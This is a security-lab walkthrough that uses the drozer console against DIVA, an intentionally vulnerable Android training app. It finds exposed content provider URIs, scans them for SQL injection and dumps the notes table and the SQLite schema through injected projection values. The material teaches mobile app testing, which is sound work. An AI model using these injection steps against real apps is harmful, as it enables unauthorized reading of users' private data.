References:
Genymotion: https://www.genymotion.com/
DIVA: https://github.com/payatu/diva-andro
https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz
Drozer: https://labs.mwrinfosecurity.com/tools/drozer/
https://github.com/mwrlabs/drozer
Download Link:
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
Document:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
1. Connect to the drozer server
Start the drozer server on the Genymotion Android device.
On the client PC, forward the port with adb: “adb forward tcp:31415 tcp:31415”
Then open a drozer console: “drozer console connect”
Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.3)
dz> help
drozer: Android Security Assessment Framework
Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.
Commands:
cd contributors env help load permissions set unset
clean echo exit list module run shell
Miscellaneous help topics:
intents
2. Scan for content URI paths
dz> run app.package.list -f diva
jakhar.aseem.diva (Diva)
dz> run app.provider.
app.provider.columns app.provider.download app.provider.info app.provider.query app.provider.update
app.provider.delete app.provider.finduri app.provider.insert app.provider.read
dz> run app.provider.finduri jakhar.aseem.diva
Scanning jakhar.aseem.diva...
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
content://jakhar.aseem.diva.provider.notesprovider/notes
3. Query the content provider's data
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
| _id | title | note |
| 5 | Exercise | Alternate days running |
| 4 | Expense | Spent too much on home theater |
| 6 | Weekend | b333333333333r |
| 3 | holiday | Either Goa or Amsterdam |
| 2 | home | Buy toys for baby, Order dinner |
| 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
4. Scan for SQL injection points
Two query parameters are tested for injection: projection and selection.
dz> run scanner.provider.injection -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Not Vulnerable:
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
Injection in Projection:
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider/notes
Injection in Selection:
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider/notes
5. Validate the SQL injection points
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"
unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | notes | notes | 4 | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
| table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"
| _id | title | note |
| 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
| 2 | home | Buy toys for baby, Order dinner |
| 3 | holiday | Either Goa or Amsterdam |
| 4 | Expense | Spent too much on home theater |
| 5 | Exercise | Alternate days running |
| 6 | Weekend | b333333333333r |